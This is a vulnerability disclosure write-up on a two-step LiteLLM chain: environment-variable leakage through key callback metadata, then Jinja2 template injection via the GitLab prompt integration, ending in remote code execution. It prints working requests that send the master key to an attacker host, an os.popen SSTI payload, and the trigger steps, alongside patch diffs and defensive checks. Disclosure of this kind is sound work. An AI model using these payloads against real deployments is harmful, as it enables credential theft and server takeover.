Introduction

LiteLLM is an open-source proxy server that provides a unified API gateway for over 100 large language model (LLM) providers. It sits between application developers and services such as OpenAI, Anthropic and Ollama, providing features like API key management, spend tracking, rate limiting and observability integrations. Organisations deploy LiteLLM as a centralised proxy so that multiple teams can share access to LLM backends through a single endpoint.

During research for Pwn2Own Berlin 2026, I identified a chain of two vulnerabilities in LiteLLM v1.83.14 that, when combined, allow any holder of a standard API key to achieve remote code execution on the proxy server. The chain escalates from a low-privilege internal_user API key to full admin access via an environment variable disclosure, then leverages a Jinja2 Server-Side Template Injection (SSTI) in the GitLab prompt management integration to execute arbitrary commands in-process.

The attack requires HTTP access to the LiteLLM proxy and a standard API key, which is the normal level of access that someone using the proxy would have.

Don’t care how it works and just want to pop a shell? You can find the full exploit code at github.com/McCaulay/RCEliteLLM.

Background

LiteLLM architecture

LiteLLM runs as a Python-based HTTP proxy built on FastAPI. In production deployments, it connects to a database such as PostgreSQL for API key management, spend tracking and prompt storage. The proxy authenticates requests using API keys, with two primary roles:

- internal_user: The standard role for API key holders. Can make LLM completion requests, generate new API keys and access spend tracking endpoints.
- PROXY_ADMIN: The administrator role. Has full control over proxy configuration, model management and security settings.

The admin authenticates using a master key, typically set via the LITELLM_MASTER_KEY environment variable or via the master_key field in the YAML configuration file. This is the standard deployment pattern in Docker-based production environments.

Observability integrations

LiteLLM supports numerous callback integrations for observability, including LangSmith, Langfuse, Arize and others. These callbacks fire after each LLM completion request and send telemetry data (request metadata, token usage, latency) to the configured observability platform. The callback configuration can be set globally in the YAML configuration file, or dynamically per API key via metadata.logging in the key’s metadata.

Prompt management

LiteLLM provides a prompt management system that integrates with external prompt registries including GitLab, BitBucket and Arize Phoenix. When a prompt is configured with a GitLab integration, the proxy fetches .prompt template files from the configured GitLab instance and renders them using Jinja2 before passing the result to the LLM backend.

Environment variable disclosure via callback metadata

While auditing the API key generation endpoint, I noticed that the metadata.logging field accepts callback configuration with arbitrary variable values. The POST /key/generate endpoint is accessible to any internal_user and stores the callback configuration in the database alongside the key.

When a subsequent completion request is made with a key that has callback metadata, the proxy processes the metadata in convert_key_logging_metadata_to_callback() at litellm/proxy/litellm_pre_call_utils.py:

    def convert_key_logging_metadata_to_callback(
        data: AddTeamCallback, team_callback_settings_obj: ...
    ) -> TeamCallbackMetadata:
        ...
        for var, value in data.callback_vars.items():
            team_callback_settings_obj.callback_vars[var] = str(
                litellm.utils.get_secret(value, default_value=value) or value
            )

Each value in the user-controlled callback_vars dictionary is passed through get_secret(). This function was originally designed for resolving environment variable references in administrator-controlled YAML configuration files. When no external secret manager is configured (the default), get_secret() falls through to os.environ.get() at litellm/secret_managers/main.py:

    else:
        secret = os.environ.get(secret_name)
        ...
        return secret

There is a security check in initialize_dynamic_callback_params that blocks values containing the os.environ/ prefix:

    def _is_env_reference(value: object) -> bool:
        return isinstance(value, str) and "os.environ/" in value

However, get_secret() also resolves bare environment variable names without the prefix. Setting langsmith_api_key to the literal string "LITELLM_MASTER_KEY" passes the security check but still resolves to the actual value of the environment variable.
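The gap between the check and the resolver can be reproduced in isolation. The following is a minimal sketch, not LiteLLM's code: `is_env_reference` copies the check quoted above, while `resolve_like_get_secret` and the `DEMO_SECRET` variable are hypothetical stand-ins that only model the fall-through to `os.environ.get()`.

```python
import os


def is_env_reference(value: object) -> bool:
    """Copy of the prefix check quoted above."""
    return isinstance(value, str) and "os.environ/" in value


def resolve_like_get_secret(name: str, default: str) -> str:
    """Hypothetical stand-in: treat the string as an environment variable name."""
    prefix = "os.environ/"
    if name.startswith(prefix):
        name = name[len(prefix):]
    # Fall back to the literal value when no such variable exists.
    return os.environ.get(name) or default


# Assumed variable name, set here only so the demo has something to resolve.
os.environ["DEMO_SECRET"] = "s3cr3t-value"

for candidate in ("os.environ/DEMO_SECRET", "DEMO_SECRET", "plain-literal"):
    blocked = is_env_reference(candidate)
    resolved = None if blocked else resolve_like_get_secret(candidate, candidate)
    print(f"{candidate!r}: blocked={blocked}, resolved={resolved!r}")
```

Only the prefixed form is blocked. The bare name passes the check and still resolves to the variable's value, which is the behaviour the exploit relies on.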

Now, the obvious environment variable to leak is the LITELLM_MASTER_KEY, and we can do that by sending the following POST request:

    POST /key/generate
    Authorization: Bearer <internal_user_key>
    Content-Type: application/json

    {
      "metadata": {
        "logging": [{
          "callback_name": "langsmith",
          "callback_type": "success_and_failure",
          "callback_vars": {
            "langsmith_api_key": "LITELLM_MASTER_KEY",
            "langsmith_project": "exfil",
            "langsmith_base_url": "http://<ATTACKER-HOST>:8080"
          }
        }]
      }
    }

The request creates an API key with a LangSmith callback configuration where langsmith_api_key is set to the bare string "LITELLM_MASTER_KEY" and langsmith_base_url points to an attacker-controlled HTTP listener.

When the poisoned key is then used for a completion request, the proxy resolves get_secret("LITELLM_MASTER_KEY") to the actual master key value and passes it to the LangSmith integration. The LangSmith callback, which is built into LiteLLM and uses httpx, sends a POST request to the attacker’s URL with the resolved value in the x-api-key HTTP header:

    # litellm/integrations/langsmith.py
    langsmith_api_key = credentials["LANGSMITH_API_KEY"]
    headers = {"x-api-key": langsmith_api_key}
    response = await self.async_httpx_client.post(
        url=url,
        json={"post": elements_to_log},
        headers=headers,
    )

The attacker’s HTTP listener receives the LITELLM_MASTER_KEY:

    POST /api/v1/runs/batch HTTP/1.1
    x-api-key: sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
    Content-Type: application/json
    ...

The attacker now holds the master key, and with it PROXY_ADMIN privileges. The same technique is not limited to LITELLM_MASTER_KEY: it can leak any other environment variable accessible to the LiteLLM process, such as DATABASE_URL, OPENAI_API_KEY and AWS_SECRET_ACCESS_KEY.
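For defenders, one way to look for this pattern in existing keys is to flag any callback variable whose value exactly matches the name of an environment variable. The sketch below assumes the key metadata has the shape shown in the request above. The function name and the way the metadata is obtained are hypothetical, and it is a heuristic rather than a complete detection.

```python
import os
from typing import Any, Iterator, Mapping


def find_env_name_callback_vars(
    metadata: Mapping[str, Any],
    environ: Mapping[str, str] = os.environ,
) -> Iterator[tuple[str, str, str]]:
    """Yield (callback_name, var, value) where value names an environment variable."""
    for entry in metadata.get("logging") or []:
        callback_vars = entry.get("callback_vars") or {}
        for var, value in callback_vars.items():
            if isinstance(value, str) and value in environ:
                yield entry.get("callback_name", ""), var, value


# Sample metadata mirroring the poisoned key from the request above.
sample_metadata = {
    "logging": [{
        "callback_name": "langsmith",
        "callback_type": "success_and_failure",
        "callback_vars": {
            "langsmith_api_key": "LITELLM_MASTER_KEY",
            "langsmith_project": "exfil",
            "langsmith_base_url": "http://attacker.invalid:8080",
        },
    }]
}

# A stand-in environment so the example does not depend on the real one.
fake_environ = {"LITELLM_MASTER_KEY": "sk-demo"}
print(list(find_env_name_callback_vars(sample_metadata, fake_environ)))
```

With the sample data, only the langsmith_api_key entry is reported, because its value is the name of a variable present in the stand-in environment.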

Jinja2 SSTI via GitLab prompt integration

With PROXY_ADMIN access obtained from the first vulnerability, I examined what additional functionality could lead to remote code execution. The prompt management system stood out: it fetches template files from external servers and renders them with Jinja2.

The GitLab prompt manager at litellm/integrations/gitlab/gitlab_prompt_manager.py initialises its Jinja2 environment:

    self.jinja_env = Environment(
        loader=DictLoader({}),
        autoescape=select_autoescape(["html", "xml"]),
        variable_start_string="{{",
        variable_end_string="}}",
        ...
    )

This uses jinja2.Environment, not SandboxedEnvironment or ImmutableSandboxedEnvironment. Contrast this with the dotprompt integration at integrations/dotprompt/prompt_manager.py, which correctly uses ImmutableSandboxedEnvironment. The inconsistency suggests the GitLab integration was overlooked during an earlier security hardening effort.

Template rendering occurs further down:

    jinja_template = self.jinja_env.from_string(template.content)
    return jinja_template.render(**(variables or {}))

The template content comes from a GitLab server, and that server can be one the attacker controls. In a non-sandboxed Jinja2 Environment, the default globals (cycler, namespace, lipsum) provide entry points to traverse Python’s object graph and reach arbitrary code execution.

SSTI payload

The SSTI payload leverages cycler, which is a default Jinja2 global (jinja2.utils.Cycler). Since cycler is a Python class, its __init__ method has __globals__ containing a reference to __builtins__, which gives access to __import__:

    {{ cycler.__init__.__globals__['__builtins__']['__import__']('os').popen('COMMAND').read() }}

This chain works because cycler is available in Jinja2’s non-sandboxed Environment, and its __init__ function exposes an accessible __globals__ dictionary. That dictionary contains the key __builtins__, which provides access to __import__. Finally, __import__ can be used to import arbitrary modules such as os and call functions like os.popen.

The payload is embedded in a .prompt file with YAML frontmatter, matching the format that the GitLab prompt manager expects:

    ---
    model: smollm2:135m
    ---
    user: {{ cycler.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read() }}

The attacker starts a minimal HTTP server that mimics the GitLab repository files API. Any GET request returns the .prompt file containing the SSTI payload.

Using the leaked master key, the attacker creates a prompt via POST /prompts with prompt_integration set to "gitlab" and gitlab_config.base_url pointing to the fake server. The PromptLiteLLMParams model uses extra="allow" in its Pydantic configuration, which permits arbitrary fields like gitlab_config to pass through without validation:

    POST /prompts
    Authorization: Bearer <leaked_master_key>
    Content-Type: application/json

    {
      "prompt_id": "ssti_payload",
      "litellm_params": {
        "prompt_id": "ssti_payload.v1",
        "prompt_integration": "gitlab",
        "gitlab_config": {
          "project": "1",
          "access_token": "dummy",
          "base_url": "http://<ATTACKER-HOST>/api/v4",
          "branch": "main"
        }
      },
      "prompt_info": {"prompt_type": "config"}
    }
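The pass-through behaviour of extra="allow" can be illustrated with a small Pydantic model. This is a sketch assuming Pydantic v2. `PermissiveParams` and `StrictParams` are hypothetical classes written for the comparison, not LiteLLM's PromptLiteLLMParams.

```python
from typing import Optional

from pydantic import BaseModel, ConfigDict, ValidationError


class PermissiveParams(BaseModel):
    """Hypothetical model: unknown fields are kept without validation."""
    model_config = ConfigDict(extra="allow")
    prompt_id: Optional[str] = None


class StrictParams(BaseModel):
    """Hypothetical model: unknown fields are rejected."""
    model_config = ConfigDict(extra="forbid")
    prompt_id: Optional[str] = None


payload = {
    "prompt_id": "demo.v1",
    "gitlab_config": {"base_url": "http://example.invalid/api/v4"},
}

permissive = PermissiveParams(**payload)
# The undeclared field survives untouched in model_extra.
print(permissive.model_extra)

try:
    StrictParams(**payload)
except ValidationError as exc:
    print("rejected:", exc.error_count(), "error(s)")
```

With extra="allow", nothing constrains the shape or destination of gitlab_config, so any checks on fields such as base_url have to happen elsewhere in the code path.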

During prompt creation, the proxy immediately fetches the .prompt file from the fake GitLab API and caches the template. The template is not rendered at this point.

The attacker then triggers rendering by making a completion request with the prompt_id:

    POST /v1/chat/completions
    Authorization: Bearer <leaked_master_key>
    Content-Type: application/json

    {
      "model": "smollm2:135m",
      "messages": [{"role": "user", "content": "trigger"}],
      "prompt_id": "ssti_payload",
      "prompt_variables": {}
    }

The proxy resolves the prompt, retrieves the cached template and calls Environment.from_string(content).render(). The non-sandboxed Jinja2 environment allows the cycler traversal to reach os.popen(), which spawns the command from inside the LiteLLM proxy process itself, where the injected template code has access to all Python globals and database connections.

Poppin’ a shell



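The full exploit chain proceeds as follows:

- Using a standard internal_user API key, call POST /key/generate to create a key whose LangSmith callback sets langsmith_api_key to "LITELLM_MASTER_KEY" and langsmith_base_url to an attacker-controlled listener.
- Make a completion request with the new key so that the callback fires and delivers the master key in the x-api-key header.
- Serve a .prompt file containing the SSTI payload from a fake GitLab repository files API.
- Using the leaked master key, create a prompt via POST /prompts with gitlab_config.base_url pointing at the fake server.
- Make a completion request that references the prompt_id, which renders the template and executes the command.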

You can find the full exploit code at github.com/McCaulay/RCEliteLLM.

Patches

Both vulnerabilities were patched in LiteLLM v1.84.0-rc.1 shortly before Pwn2Own Berlin 2026.

Vulnerability 1: Environment variable disclosure

The patch was applied across four independent layers:

Primary fix (4ff8f0e9, PR #26851): The get_secret() call was removed from convert_key_logging_metadata_to_callback(). Callback variable values are now stored as literal strings without any environment variable resolution:

    # Before (vulnerable):
    team_callback_settings_obj.callback_vars[var] = str(
        litellm.utils.get_secret(value, default_value=value) or value
    )

    # After (fixed):
    team_callback_settings_obj.callback_vars[var] = str(value)

Defence in depth

- 15d4d514: The LangSmith and Langfuse integrations now set allow_env_credentials=False when a custom base URL is provided, preventing credential resolution from environment variables when the callback destination is user-controlled.
- 37a22acf: The request body validator now checks metadata and litellm_metadata containers against the banned parameters list. The banned list is auto-derived from _supported_callback_params so that future integrations are covered automatically.
- f05da4fc: Callback variable values are encrypted at rest in the database, reducing the impact of database compromise.

Vulnerability 2: Jinja2 SSTI

Primary fix (de28a4f3): All three affected prompt managers (GitLab, BitBucket and Arize Phoenix) were switched from jinja2.Environment to jinja2.sandbox.ImmutableSandboxedEnvironment. The sandbox blocks attribute traversal via dunders (__init__, __globals__, __class__), preventing the object graph traversal required for the SSTI payload:

    # Before (vulnerable):
    self.jinja_env = Environment(
        loader=DictLoader({}),
        ...
    )

    # After (fixed):
    self.jinja_env = ImmutableSandboxedEnvironment(
        loader=DictLoader({}),
        ...
    )

The ImmutableSandboxedEnvironment was already in use by the dotprompt integration, making this an inconsistency fix. Additionally, Jinja2 is pinned to version 3.1.6, which includes fixes for CVE-2024-56326 and CVE-2024-56201 (sandbox bypass vulnerabilities in earlier Jinja2 versions).
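The difference between the two environments can be checked with a harmless probe. The sketch below follows the same cycler traversal as the payload but only reads a module name instead of reaching __builtins__. `PROBE` and `render_probe` are names introduced for this illustration, and the example assumes a recent Jinja2 3.x release.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Harmless probe: same attribute traversal as the payload, but read-only.
PROBE = "{{ cycler.__init__.__globals__['__name__'] }}"


def render_probe(env: Environment) -> str:
    """Render the probe, reporting a sandbox refusal instead of raising."""
    try:
        return env.from_string(PROBE).render()
    except SecurityError as exc:
        return f"blocked: {type(exc).__name__}"


# Plain Environment: the traversal succeeds and leaks the defining module.
print(render_probe(Environment()))

# Sandboxed environment: underscore-prefixed attributes are refused.
print(render_probe(ImmutableSandboxedEnvironment()))
```

In the plain Environment the probe renders the name of the module that defines cycler, while the sandboxed environment should refuse the dunder access with a SecurityError. A check along these lines could serve as a regression test for each prompt manager.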

Additional hardening

Beyond the two primary vulnerability fixes, v1.84.0-rc.1 includes several related hardening measures:

- The master key is stored in the API key cache using an alias constant rather than the plaintext value (user_api_key_auth.py:1180)
- The /memory-usage-in-mem-cache-items endpoint was moved to master_key_only_routes, preventing non-admin access to cache contents
- A secret_redaction module scrubs sk- prefixed keys and master_key= patterns from error messages and logs
- The check_complete_credentials bypass was removed from auth_utils.py
- Non-admin users can no longer set allowed_routes or allowed_passthrough_routes on generated keys
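To give a feel for what log redaction of this kind involves, here is a minimal sketch. It is not LiteLLM's secret_redaction module: the regular expressions, the placeholder text and the `redact_secrets` name are assumptions chosen for illustration.

```python
import re

# Hypothetical patterns, chosen for illustration only.
_SK_KEY = re.compile(r"\bsk-[A-Za-z0-9_-]+")
_MASTER_KEY_ASSIGNMENT = re.compile(r"(master_key=)\S+")


def redact_secrets(message: str) -> str:
    """Replace sk- prefixed tokens and master_key= values with a placeholder."""
    message = _SK_KEY.sub("sk-[REDACTED]", message)
    return _MASTER_KEY_ASSIGNMENT.sub(r"\1[REDACTED]", message)


print(redact_secrets("auth failed for sk-abc_123"))
print(redact_secrets("config master_key=hunter2 loaded"))
```

Redaction like this limits accidental exposure in logs and error messages. It does not address the disclosure path described earlier, where the secret is sent deliberately in an outbound header.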

Conclusion

This research demonstrated how two individually limited vulnerabilities can be chained to achieve full remote code execution from a low-privilege starting position. The environment variable disclosure alone is a significant information leak, and the Jinja2 SSTI alone requires admin access, but combined they form a complete chain from privilege escalation to RCE.

The root causes trace back to two common patterns in web application security: passing user-controlled values through a function designed for trusted configuration data (get_secret()), and inconsistent application of security controls across similar code paths (sandboxed Jinja2 in dotprompt but not in gitlab/bitbucket/arize).

Both vulnerabilities were patched in v1.84.0-rc.1 with defence-in-depth measures at multiple layers. The patches address the immediate vulnerabilities and also harden the surrounding attack surface against similar issues in future integrations.